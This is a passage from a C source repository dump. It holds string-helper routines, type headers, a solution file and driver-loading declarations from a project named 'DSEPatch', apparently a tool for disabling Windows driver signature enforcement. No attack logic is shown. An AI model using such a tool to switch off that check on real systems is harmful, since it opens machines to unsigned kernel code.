(wchar_t *)s; 19 | 20 | if ( s==0 ) 21 | return 0; 22 | 23 | while ( *s!=0 ) 24 | s++; 25 | 26 | return (s-s0); 27 | } 28 | -------------------------------------------------------------------------------- /source/ApiSetSchema/minirtl/_strncmpi.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | int _strncmpi_a(const char *s1, const char *s2, size_t cchars) 4 | { 5 | char c1, c2; 6 | 7 | if ( s1==s2 ) 8 | return 0; 9 | 10 | if ( s1==0 ) 11 | return -1; 12 | 13 | if ( s2==0 ) 14 | return 1; 15 | 16 | if ( cchars==0 ) 17 | return 0; 18 | 19 | do { 20 | c1 = locase_a(*s1); 21 | c2 = locase_a(*s2); 22 | s1++; 23 | s2++; 24 | cchars--; 25 | } while ( (c1 != 0) && (c1 == c2) && (cchars>0) ); 26 | 27 | return (int)(c1 - c2); 28 | } 29 | 30 | int _strncmpi_w(const wchar_t *s1, const wchar_t *s2, size_t cchars) 31 | { 32 | wchar_t c1, c2; 33 | 34 | if ( s1==s2 ) 35 | return 0; 36 | 37 | if ( s1==0 ) 38 | return -1; 39 | 40 | if ( s2==0 ) 41 | return 1; 42 | 43 | if ( cchars==0 ) 44 | return 0; 45 | 46 | do { 47 | c1 = locase_w(*s1); 48 | c2 = locase_w(*s2); 49 | s1++; 50 | s2++; 51 | cchars--; 52 | } while ( (c1 != 0) && (c1 == c2) && (cchars>0) ); 53 | 54 | return (int)(c1 - c2); 55 | } 56 | -------------------------------------------------------------------------------- /source/ApiSetSchema/minirtl/_strncpy.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | char *_strncpy_a(char *dest, size_t ccdest, const char *src, size_t ccsrc) 4 | { 5 | char *p; 6 | 7 | if ( (dest==0) || (src==0) || (ccdest==0) ) 8 | return dest; 9 | 10 | ccdest--; 11 | p = dest; 12 | 13 | while ( (*src!=0) && (ccdest>0) && (ccsrc>0) ) { 14 | *p = *src; 15 | p++; 16 | src++; 17 | ccdest--; 18 | ccsrc--; 19 | } 20 | 21 | *p = 0; 22 | return dest; 23 | } 24 | 25 | wchar_t *_strncpy_w(wchar_t *dest, size_t ccdest, const wchar_t *src, size_t ccsrc) 26 | { 27 | wchar_t *p; 28 | 29 | if ( (dest==0) || (src==0) || (ccdest==0) ) 30 | return dest; 31 | 32 | ccdest--; 33 | p = dest; 34 | 35 | while ( (*src!=0) && (ccdest>0) && (ccsrc>0) ) { 36 | *p = *src; 37 | p++; 38 | src++; 39 | ccdest--; 40 | ccsrc--; 41 | } 42 | 43 | *p = 0; 44 | return dest; 45 | } 46 | -------------------------------------------------------------------------------- /source/ApiSetSchema/minirtl/_strstr.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | char *_strstr_a(const char *s, const char *sub_s) 4 | { 5 | char c0, c1, c2, *tmps, *tmpsub; 6 | 7 | if (s == sub_s) 8 | return (char *)s; 9 | 10 | if (s == 0) 11 | return 0; 12 | 13 | if (sub_s == 0) 14 | return 0; 15 | 16 | c0 = *sub_s; 17 | while (c0 != 0) { 18 | 19 | while (*s != 0) { 20 | c2 = *s; 21 | if (c2 == c0) 22 | break; 23 | s++; 24 | } 25 | 26 | if (*s == 0) 27 | return 0; 28 | 29 | tmps = (char *)s; 30 | tmpsub = (char *)sub_s; 31 | do { 32 | c1 = *tmps; 33 | c2 = *tmpsub; 34 | tmps++; 35 | tmpsub++; 36 | } while ((c1 == c2) && (c2 != 0)); 37 | 38 | if (c2 == 0) 39 | return (char *)s; 40 | 41 | s++; 42 | } 43 | return 0; 44 | } 45 | 46 | wchar_t *_strstr_w(const wchar_t *s, const wchar_t *sub_s) 47 | { 48 | wchar_t c0, c1, c2, *tmps, *tmpsub; 49 | 50 | if (s == sub_s) 51 | return (wchar_t *)s; 52 | 53 | if (s == 0) 54 | return 0; 55 | 56 | if (sub_s == 0) 57 | return 0; 58 | 59 | c0 = *sub_s; 60 | while (c0 != 0) { 61 | 62 | while (*s != 0) { 63 | c2 = *s; 64 | if (c2 == c0) 65 | break; 66 | s++; 67 | } 68 | 69 | if (*s == 0) 70 | return 0; 71 | 72 | tmps = (wchar_t *)s; 73 | tmpsub = (wchar_t *)sub_s; 74 | do { 75 | c1 = *tmps; 76 | c2 = *tmpsub; 77 | tmps++; 78 | tmpsub++; 79 | } while ((c1 == c2) && (c2 != 0)); 80 | 81 | if (c2 == 0) 82 | return (wchar_t *)s; 83 | 84 | s++; 85 | } 86 | return 0; 87 | } 88 | -------------------------------------------------------------------------------- /source/ApiSetSchema/minirtl/rtltypes.h: -------------------------------------------------------------------------------- 1 | #ifndef _WCHAR_T_DEFINED 2 | typedef unsigned short wchar_t; 3 | #define _WCHAR_T_DEFINED 4 | #endif /* _WCHAR_T_DEFINED */ 5 | 6 | #ifndef _SIZE_T_DEFINED 7 | #ifdef _WIN64 8 | typedef unsigned __int64 size_t; 9 | #else /* _WIN64 */ 10 | typedef __w64 unsigned int size_t; 11 | #endif /* _WIN64 */ 12 | #define _SIZE_T_DEFINED 13 | #endif /* _SIZE_T_DEFINED */ 14 | 15 | __forceinline char locase_a(char c) 16 | { 17 | if ((c >= 'A') && (c <= 'Z')) 18 | return c + 0x20; 19 | else 20 | return c; 21 | } 22 | 23 | __forceinline wchar_t locase_w(wchar_t c) 24 | { 25 | if ((c >= 'A') && (c <= 'Z')) 26 | return c + 0x20; 27 | else 28 | return c; 29 | } 30 | 31 | __forceinline char byteabs(char x) { 32 | if (x < 0) 33 | return -x; 34 | return x; 35 | } 36 | 37 | __forceinline int _isdigit_a(char x) { 38 | return ((x >= '0') && (x <= '9')); 39 | } 40 | 41 | __forceinline int _isdigit_w(wchar_t x) { 42 | return ((x >= L'0') && (x <= L'9')); 43 | } 44 | -------------------------------------------------------------------------------- /source/ApiSetSchema/minirtl/ultostr.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | size_t ultostr_a(unsigned long x, char *s) 4 | { 5 | unsigned long t=x; 6 | size_t i, r=1; 7 | 8 | while ( t >= 10 ) { 9 | t /= 10; 10 | r++; 11 | } 12 | 13 | if (s == 0) 14 | return r; 15 | 16 | for (i = r; i != 0; i--) { 17 | s[i-1] = (char)(x % 10) + '0'; 18 | x /= 10; 19 | } 20 | 21 | s[r] = (char)0; 22 | return r; 23 | } 24 | 25 | size_t ultostr_w(unsigned long x, wchar_t *s) 26 | { 27 | unsigned long t=x; 28 | size_t i, r=1; 29 | 30 | while ( t >= 10 ) { 31 | t /= 10; 32 | r++; 33 | } 34 | 35 | if (s == 0) 36 | return r; 37 | 38 | for (i = r; i != 0; i--) { 39 | s[i-1] = (wchar_t)(x % 10) + L'0'; 40 | x /= 10; 41 | } 42 | 43 | s[r] = (wchar_t)0; 44 | return r; 45 | } 46 | -------------------------------------------------------------------------------- /source/ApiSetSchema/resource.h: -------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Visual C++ generated include file. 3 | // Used by Resource.rc 4 | // 5 | #define IDD_ASDIALOG 101 6 | #define IDI_ICON_MAIN 103 7 | #define IDC_SEARCH_EDIT 1001 8 | #define IDC_SEARCH_BUTTON 1002 9 | #define IDC_ENTRY_EDIT 1003 10 | 11 | // Next default values for new objects 12 | // 13 | #ifdef APSTUDIO_INVOKED 14 | #ifndef APSTUDIO_READONLY_SYMBOLS 15 | #define _APS_NEXT_RESOURCE_VALUE 104 16 | #define _APS_NEXT_COMMAND_VALUE 40001 17 | #define _APS_NEXT_CONTROL_VALUE 1003 18 | #define _APS_NEXT_SYMED_VALUE 101 19 | #endif 20 | #endif 21 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28307.271 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DSEPatch", "DSEPatch\DSEPatch.vcxproj", "{75CEED88-EA4C-4F16-AC88-5F223AAB0591}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Release|x64 = Release|x64 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {75CEED88-EA4C-4F16-AC88-5F223AAB0591}.Debug|x64.ActiveCfg = Debug|x64 15 | {75CEED88-EA4C-4F16-AC88-5F223AAB0591}.Debug|x64.Build.0 = Debug|x64 16 | {75CEED88-EA4C-4F16-AC88-5F223AAB0591}.Release|x64.ActiveCfg = Release|x64 17 | {75CEED88-EA4C-4F16-AC88-5F223AAB0591}.Release|x64.Build.0 = Release|x64 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {903A1DAC-7E4E-4237-BA77-08CB08936EA9} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/DSEPatch.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | WindowsLocalDebugger 7 | 8 | 9 | -r 10 | WindowsLocalDebugger 11 | 12 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/cui/cui.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************* 2 | * 3 | * (C) COPYRIGHT AUTHORS, 2016 - 2018 4 | * 5 | * TITLE: CUI.H 6 | * 7 | * VERSION: 1.30 8 | * 9 | * DATE: 01 Aug 2018 10 | * 11 | * Common header file for console ui. 12 | * 13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF 14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED 15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A 16 | * PARTICULAR PURPOSE. 17 | * 18 | *******************************************************************************/ 19 | #pragma once 20 | 21 | VOID cuiInitialize( 22 | _In_ BOOL InitInput, 23 | _Out_opt_ PBOOL IsConsoleOutput 24 | ); 25 | 26 | #ifdef _UNICODE 27 | #define cuiPrintText cuiPrintTextW 28 | #define cuiPrintTextLastError cuiPrintTextLastErrorW 29 | #else 30 | #define cuiPrintText cuiPrintTextA 31 | #define cuiPrintTextLastError cuiPrintTextLastErrorA 32 | #endif 33 | 34 | 35 | VOID cuiPrintTextA( 36 | _In_ LPSTR lpText, 37 | _In_ BOOL UseReturn 38 | ); 39 | 40 | VOID cuiPrintTextW( 41 | _In_ LPWSTR lpText, 42 | _In_ BOOL UseReturn 43 | ); 44 | 45 | VOID cuiPrintTextLastErrorA( 46 | _In_ BOOL UseReturn 47 | ); 48 | 49 | VOID cuiPrintTextLastErrorW( 50 | _In_ BOOL UseReturn 51 | ); 52 | 53 | VOID cuiClrScr( 54 | VOID 55 | ); 56 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/global.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************* 2 | * 3 | * (C) COPYRIGHT AUTHORS, 2016 - 2019 4 | * 5 | * TITLE: GLOBAL.H 6 | * 7 | * VERSION: 1.05 8 | * 9 | * DATE: 22 Jan 2019 10 | * 11 | * Common header file for the program support routines. 12 | * 13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF 14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED 15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A 16 | * PARTICULAR PURPOSE. 17 | * 18 | *******************************************************************************/ 19 | #pragma once 20 | 21 | #if !defined UNICODE 22 | #error ANSI build is not supported 23 | #endif 24 | 25 | #pragma warning(disable: 4005) // macro redefinition 26 | #pragma warning(disable: 4152) // nonstandard extension, function/data pointer conversion in expression 27 | #pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union 28 | 29 | 30 | #if defined (_MSC_VER) 31 | #if (_MSC_VER >= 1900) 32 | #ifdef _DEBUG 33 | #pragma comment(lib, "vcruntimed.lib") 34 | #pragma comment(lib, "ucrtd.lib") 35 | #else 36 | #pragma comment(lib, "libucrt.lib") 37 | #pragma comment(lib, "libvcruntime.lib") 38 | #endif 39 | #endif 40 | #endif 41 | 42 | #include 43 | #include 44 | #include "vbox.h" 45 | #include "ntdll/ntos.h" 46 | #include "minirtl/minirtl.h" 47 | #include "minirtl/cmdline.h" 48 | #include "hde/hde64.h" 49 | #include "cui/cui.h" 50 | #include "sup.h" 51 | #include "instdrv.h" 52 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/hde/pstdint.h: -------------------------------------------------------------------------------- 1 | /* 2 | * MinHook - The Minimalistic API Hooking Library for x64/x86 3 | * Copyright (C) 2009-2015 Tsuda Kageyu. All rights reserved. 4 | * 5 | * Redistribution and use in source and binary forms, with or without 6 | * modification, are permitted provided that the following conditions 7 | * are met: 8 | * 9 | * 1. Redistributions of source code must retain the above copyright 10 | * notice, this list of conditions and the following disclaimer. 11 | * 2. Redistributions in binary form must reproduce the above copyright 12 | * notice, this list of conditions and the following disclaimer in the 13 | * documentation and/or other materials provided with the distribution. 14 | * 15 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR 16 | * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES 17 | * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 18 | * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, 19 | * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 20 | * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 21 | * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 22 | * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 23 | * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF 24 | * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 25 | */ 26 | 27 | #pragma once 28 | 29 | #include 30 | 31 | // Integer types for HDE. 32 | typedef INT8 int8_t; 33 | typedef INT16 int16_t; 34 | typedef INT32 int32_t; 35 | typedef INT64 int64_t; 36 | typedef UINT8 uint8_t; 37 | typedef UINT16 uint16_t; 38 | typedef UINT32 uint32_t; 39 | typedef UINT64 uint64_t; 40 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/instdrv.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************* 2 | * 3 | * (C) COPYRIGHT AUTHORS, 2015 - 2017, portions (C) Mark Russinovich, FileMon 4 | * 5 | * TITLE: INSTDRV.H 6 | * 7 | * VERSION: 1.10 8 | * 9 | * DATE: 17 Apr 2017 10 | * 11 | * Common header file for the program SCM usage. 12 | * 13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF 14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED 15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A 16 | * PARTICULAR PURPOSE. 17 | * 18 | *******************************************************************************/ 19 | #pragma once 20 | 21 | BOOL scmInstallDriver( 22 | _In_ SC_HANDLE SchSCManager, 23 | _In_ LPCTSTR DriverName, 24 | _In_opt_ LPCTSTR ServiceExe 25 | ); 26 | 27 | BOOL scmStartDriver( 28 | _In_ SC_HANDLE SchSCManager, 29 | _In_ LPCTSTR DriverName 30 | ); 31 | 32 | BOOL scmOpenDevice( 33 | _In_ LPCTSTR DriverName, 34 | _Inout_opt_ PHANDLE lphDevice 35 | ); 36 | 37 | BOOL scmStopDriver( 38 | _In_ SC_HANDLE SchSCManager, 39 | _In_ LPCTSTR DriverName 40 | ); 41 | 42 | BOOL scmRemoveDriver( 43 | _In_ SC_HANDLE SchSCManager, 44 | _In_ LPCTSTR DriverName 45 | ); 46 | 47 | BOOL scmUnloadDeviceDriver( 48 | _In_ LPCTSTR Name 49 | ); 50 | 51 | BOOL scmLoadDeviceDriver( 52 | _In_ LPCTSTR Name, 53 | _In_opt_ LPCTSTR Path, 54 | _Inout_ PHANDLE lphDevice 55 | ); 56 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/minirtl/_strcat.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | char *_strcat_a(char *dest, const char *src) 4 | { 5 | if ( (dest==0) || (src==0) ) 6 | return dest; 7 | 8 | while ( *dest!=0 ) 9 | dest++; 10 | 11 | while ( *src!=0 ) { 12 | *dest = *src; 13 | dest++; 14 | src++; 15 | } 16 | 17 | *dest = 0; 18 | return dest; 19 | } 20 | 21 | wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src) 22 | { 23 | if ( (dest==0) || (src==0) ) 24 | return dest; 25 | 26 | while ( *dest!=0 ) 27 | dest++; 28 | 29 | while ( *src!=0 ) { 30 | *dest = *src; 31 | dest++; 32 | src++; 33 | } 34 | 35 | *dest = 0; 36 | return dest; 37 | } 38 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/minirtl/_strcmp.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | int _strcmp_a(const char *s1, const char *s2) 4 | { 5 | char c1, c2; 6 | 7 | if ( s1==s2 ) 8 | return 0; 9 | 10 | if ( s1==0 ) 11 | return -1; 12 | 13 | if ( s2==0 ) 14 | return 1; 15 | 16 | do { 17 | c1 = *s1; 18 | c2 = *s2; 19 | s1++; 20 | s2++; 21 | } while ( (c1 != 0) && (c1 == c2) ); 22 | 23 | return (int)(c1 - c2); 24 | } 25 | 26 | int _strcmp_w(const wchar_t *s1, const wchar_t *s2) 27 | { 28 | wchar_t c1, c2; 29 | 30 | if ( s1==s2 ) 31 | return 0; 32 | 33 | if ( s1==0 ) 34 | return -1; 35 | 36 | if ( s2==0 ) 37 | return 1; 38 | 39 | do { 40 | c1 = *s1; 41 | c2 = *s2; 42 | s1++; 43 | s2++; 44 | } while ( (c1 != 0) && (c1 == c2) ); 45 | 46 | return (int)(c1 - c2); 47 | } 48 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/minirtl/_strcmpi.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | int _strcmpi_a(const char *s1, const char *s2) 4 | { 5 | char c1, c2; 6 | 7 | if ( s1==s2 ) 8 | return 0; 9 | 10 | if ( s1==0 ) 11 | return -1; 12 | 13 | if ( s2==0 ) 14 | return 1; 15 | 16 | do { 17 | c1 = locase_a(*s1); 18 | c2 = locase_a(*s2); 19 | s1++; 20 | s2++; 21 | } while ( (c1 != 0) && (c1 == c2) ); 22 | 23 | return (int)(c1 - c2); 24 | } 25 | 26 | int _strcmpi_w(const wchar_t *s1, const wchar_t *s2) 27 | { 28 | wchar_t c1, c2; 29 | 30 | if ( s1==s2 ) 31 | return 0; 32 | 33 | if ( s1==0 ) 34 | return -1; 35 | 36 | if ( s2==0 ) 37 | return 1; 38 | 39 | do { 40 | c1 = locase_w(*s1); 41 | c2 = locase_w(*s2); 42 | s1++; 43 | s2++; 44 | } while ( (c1 != 0) && (c1 == c2) ); 45 | 46 | return (int)(c1 - c2); 47 | } 48 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/minirtl/_strcpy.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | char *_strcpy_a(char *dest, const char *src) 4 | { 5 | char *p; 6 | 7 | if ( (dest==0) || (src==0) ) 8 | return dest; 9 | 10 | if (dest == src) 11 | return dest; 12 | 13 | p = dest; 14 | while ( *src!=0 ) { 15 | *p = *src; 16 | p++; 17 | src++; 18 | } 19 | 20 | *p = 0; 21 | return dest; 22 | } 23 | 24 | wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src) 25 | { 26 | wchar_t *p; 27 | 28 | if ((dest == 0) || (src == 0)) 29 | return dest; 30 | 31 | if (dest == src) 32 | return dest; 33 | 34 | p = dest; 35 | while ( *src!=0 ) { 36 | *p = *src; 37 | p++; 38 | src++; 39 | } 40 | 41 | *p = 0; 42 | return dest; 43 | } 44 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/minirtl/_strend.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | char *_strend_a(const char *s) 4 | { 5 | if ( s==0 ) 6 | return 0; 7 | 8 | while ( *s!=0 ) 9 | s++; 10 | 11 | return (char *)s; 12 | } 13 | 14 | wchar_t *_strend_w(const wchar_t *s) 15 | { 16 | if ( s==0 ) 17 | return 0; 18 | 19 | while ( *s!=0 ) 20 | s++; 21 | 22 | return (wchar_t *)s; 23 | } 24 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/minirtl/_strlen.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | size_t _strlen_a(const char *s) 4 | { 5 | char *s0 = (char *)s; 6 | 7 | if ( s==0 ) 8 | return 0; 9 | 10 | while ( *s!=0 ) 11 | s++; 12 | 13 | return (s-s0); 14 | } 15 | 16 | size_t _strlen_w(const wchar_t *s) 17 | { 18 | wchar_t *s0 = (wchar_t *)s; 19 | 20 | if ( s==0 ) 21 | return 0; 22 | 23 | while ( *s!=0 ) 24 | s++; 25 | 26 | return (s-s0); 27 | } 28 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/minirtl/_strncmp.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | int _strncmp_a(const char *s1, const char *s2, size_t cchars) 4 | { 5 | char c1, c2; 6 | 7 | if ( s1==s2 ) 8 | return 0; 9 | 10 | if ( s1==0 ) 11 | return -1; 12 | 13 | if ( s2==0 ) 14 | return 1; 15 | 16 | if ( cchars==0 ) 17 | return 0; 18 | 19 | do { 20 | c1 = *s1; 21 | c2 = *s2; 22 | s1++; 23 | s2++; 24 | cchars--; 25 | } while ( (c1 != 0) && (c1 == c2) && (cchars>0) ); 26 | 27 | return (int)(c1 - c2); 28 | } 29 | 30 | int _strncmp_w(const wchar_t *s1, const wchar_t *s2, size_t cchars) 31 | { 32 | wchar_t c1, c2; 33 | 34 | if ( s1==s2 ) 35 | return 0; 36 | 37 | if ( s1==0 ) 38 | return -1; 39 | 40 | if ( s2==0 ) 41 | return 1; 42 | 43 | if ( cchars==0 ) 44 | return 0; 45 | 46 | do { 47 | c1 = *s1; 48 | c2 = *s2; 49 | s1++; 50 | s2++; 51 | cchars--; 52 | } while ( (c1 != 0) && (c1 == c2) && (cchars>0) ); 53 | 54 | return (int)(c1 - c2); 55 | } 56 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/minirtl/_strncmpi.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | int _strncmpi_a(const char *s1, const char *s2, size_t cchars) 4 | { 5 | char c1, c2; 6 | 7 | if ( s1==s2 ) 8 | return 0; 9 | 10 | if ( s1==0 ) 11 | return -1; 12 | 13 | if ( s2==0 ) 14 | return 1; 15 | 16 | if ( cchars==0 ) 17 | return 0; 18 | 19 | do { 20 | c1 = locase_a(*s1); 21 | c2 = locase_a(*s2); 22 | s1++; 23 | s2++; 24 | cchars--; 25 | } while ( (c1 != 0) && (c1 == c2) && (cchars>0) ); 26 | 27 | return (int)(c1 - c2); 28 | } 29 | 30 | int _strncmpi_w(const wchar_t *s1, const wchar_t *s2, size_t cchars) 31 | { 32 | wchar_t c1, c2; 33 | 34 | if ( s1==s2 ) 35 | return 0; 36 | 37 | if ( s1==0 ) 38 | return -1; 39 | 40 | if ( s2==0 ) 41 | return 1; 42 | 43 | if ( cchars==0 ) 44 | return 0; 45 | 46 | do { 47 | c1 = locase_w(*s1); 48 | c2 = locase_w(*s2); 49 | s1++; 50 | s2++; 51 | cchars--; 52 | } while ( (c1 != 0) && (c1 == c2) && (cchars>0) ); 53 | 54 | return (int)(c1 - c2); 55 | } 56 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/minirtl/_strncpy.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | char *_strncpy_a(char *dest, size_t ccdest, const char *src, size_t ccsrc) 4 | { 5 | char *p; 6 | 7 | if ( (dest==0) || (src==0) || (ccdest==0) ) 8 | return dest; 9 | 10 | ccdest--; 11 | p = dest; 12 | 13 | while ( (*src!=0) && (ccdest>0) && (ccsrc>0) ) { 14 | *p = *src; 15 | p++; 16 | src++; 17 | ccdest--; 18 | ccsrc--; 19 | } 20 | 21 | *p = 0; 22 | return dest; 23 | } 24 | 25 | wchar_t *_strncpy_w(wchar_t *dest, size_t ccdest, const wchar_t *src, size_t ccsrc) 26 | { 27 | wchar_t *p; 28 | 29 | if ( (dest==0) || (src==0) || (ccdest==0) ) 30 | return dest; 31 | 32 | ccdest--; 33 | p = dest; 34 | 35 | while ( (*src!=0) && (ccdest>0) && (ccsrc>0) ) { 36 | *p = *src; 37 | p++; 38 | src++; 39 | ccdest--; 40 | ccsrc--; 41 | } 42 | 43 | *p = 0; 44 | return dest; 45 | } 46 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/minirtl/cmdline.h: -------------------------------------------------------------------------------- 1 | #ifndef _CMDLINEH_ 2 | #define _CMDLINEH_ 3 | 4 | BOOL GetCommandLineParamW( 5 | IN LPCWSTR CmdLine, 6 | IN ULONG ParamIndex, 7 | OUT LPWSTR Buffer, 8 | IN ULONG BufferSize, 9 | OUT PULONG ParamLen 10 | ); 11 | 12 | BOOL GetCommandLineParamA( 13 | IN LPCSTR CmdLine, 14 | IN ULONG ParamIndex, 15 | OUT LPSTR Buffer, 16 | IN ULONG BufferSize, 17 | OUT PULONG ParamLen 18 | ); 19 | 20 | char *ExtractFilePathA(const char *FileName, char *FilePath); 21 | wchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath); 22 | 23 | #ifdef UNICODE 24 | 25 | #define ExtractFilePath ExtractFilePathW 26 | #define GetCommandLineParam GetCommandLineParamW 27 | 28 | #else // ANSI 29 | 30 | #define ExtractFilePath ExtractFilePathA 31 | #define GetCommandLineParam GetCommandLineParamA 32 | 33 | #endif 34 | 35 | #endif /* _CMDLINEH_ */ 36 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/minirtl/rtltypes.h: -------------------------------------------------------------------------------- 1 | #ifndef _WCHAR_T_DEFINED 2 | typedef unsigned short wchar_t; 3 | #define _WCHAR_T_DEFINED 4 | #endif /* _WCHAR_T_DEFINED */ 5 | 6 | #ifndef _SIZE_T_DEFINED 7 | #ifdef _WIN64 8 | typedef unsigned __int64 size_t; 9 | #else /* _WIN64 */ 10 | typedef __w64 unsigned int size_t; 11 | #endif /* _WIN64 */ 12 | #define _SIZE_T_DEFINED 13 | #endif /* _SIZE_T_DEFINED */ 14 | 15 | __forceinline char locase_a(char c) 16 | { 17 | if ((c >= 'A') && (c <= 'Z')) 18 | return c + 0x20; 19 | else 20 | return c; 21 | } 22 | 23 | __forceinline wchar_t locase_w(wchar_t c) 24 | { 25 | if ((c >= 'A') && (c <= 'Z')) 26 | return c + 0x20; 27 | else 28 | return c; 29 | } 30 | 31 | __forceinline char byteabs(char x) { 32 | if (x < 0) 33 | return -x; 34 | return x; 35 | } 36 | 37 | __forceinline int _isdigit_a(char x) { 38 | return ((x >= '0') && (x <= '9')); 39 | } 40 | 41 | __forceinline int _isdigit_w(wchar_t x) { 42 | return ((x >= L'0') && (x <= L'9')); 43 | } 44 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/minirtl/u64tohex.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | size_t u64tohex_a(unsigned long long x, char *s) 4 | { 5 | char p; 6 | size_t c; 7 | 8 | if (s==0) 9 | return 16; 10 | 11 | for (c=0; c<16; c++) { 12 | p = (char)(x & 0xf); 13 | x >>= 4; 14 | 15 | if (p<10) 16 | p += '0'; 17 | else 18 | p = 'A' + (p-10); 19 | 20 | s[15-c] = p; 21 | } 22 | 23 | s[16] = 0; 24 | return 16; 25 | } 26 | 27 | size_t u64tohex_w(unsigned long long x, wchar_t *s) 28 | { 29 | wchar_t p; 30 | size_t c; 31 | 32 | if (s==0) 33 | return 16; 34 | 35 | for (c = 0; c<16; c++) { 36 | p = (wchar_t)(x & 0xf); 37 | x >>= 4; 38 | 39 | if (p<10) 40 | p += L'0'; 41 | else 42 | p = L'A' + (p-10); 43 | 44 | s[15-c] = p; 45 | } 46 | 47 | s[16] = 0; 48 | return 16; 49 | } 50 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/minirtl/u64tostr.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | size_t u64tostr_a(unsigned long long x, char *s) 4 | { 5 | unsigned long long t = x; 6 | size_t i, r=1; 7 | 8 | while ( t >= 10 ) { 9 | t /= 10; 10 | r++; 11 | } 12 | 13 | if (s == 0) 14 | return r; 15 | 16 | for (i = r; i != 0; i--) { 17 | s[i-1] = (char)(x % 10) + '0'; 18 | x /= 10; 19 | } 20 | 21 | s[r] = (char)0; 22 | return r; 23 | } 24 | 25 | size_t u64tostr_w(unsigned long long x, wchar_t *s) 26 | { 27 | unsigned long long t = x; 28 | size_t i, r=1; 29 | 30 | while ( t >= 10 ) { 31 | t /= 